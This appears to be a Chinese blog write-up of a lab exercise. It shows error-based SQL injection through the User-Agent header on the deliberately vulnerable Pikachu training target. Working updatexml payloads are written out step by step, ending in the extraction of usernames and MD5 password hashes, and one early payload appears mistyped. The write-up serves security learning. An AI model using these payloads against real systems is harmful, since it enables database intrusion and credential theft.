piakchu-‘http header’注入

http消息头是指,在超文本传输协议( Hypertext Transfer Protocol ,HTTP)的请求和响应消息中,协议头部分的那些组件。

http header 头信息可以获取客户端的一些信息,比如useragent、accept等字段,而且http消息头支持自定义。

首先打开pikachu靶机,我们先根据提示使用admin 123456 来登录,然后使用burpsuit进行抓包。

会发现,它可以知道我们的ip地址,以及使用什么浏览器访问,还有端口等信息。

所以大概可以判断是通过http header的头部来获取信息的,可以猜测是inser语句。

然后看下抓包内容。

1、判断注入点及类型

将user-agent后面内容改成1和1'进行测试。

可知user-agent处存在注入点,闭合为'。

2、查询数据库名

使用以下语句注入  

1' update(0,concat(0x7b,database()),1) or '

根据报错可知数据库名字为pikachu。

3、爆表名

使用以下语句注入

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31)),1) or '

 

因为上述并没显示完整,继续查询。

' or updatexml(0,concat(0x7b,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),32,31)),1) or '

最后一个拼接的字段为xssblind。

4、爆users表的字段名

使用以下语句,同理每次按照31的字长截取。

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),1) or '

 

' or updatexml(0,concat(0x7b,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31)),1) or '

 

最后这里省略了其他的类似步骤,经过不断报错查询,可知username和password的字段。

5、爆users表的内容

最后爆数据,同样改变substr里的值就行。

' or updatexml(0,concat(0x7b,substr((select group_concat(username,':',password) from users),1,31)),1) or '

 

用同样的方法将数据不断爆出,最后这是采用MD5加密的密码,所以通过工具解下就可以了。

 

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值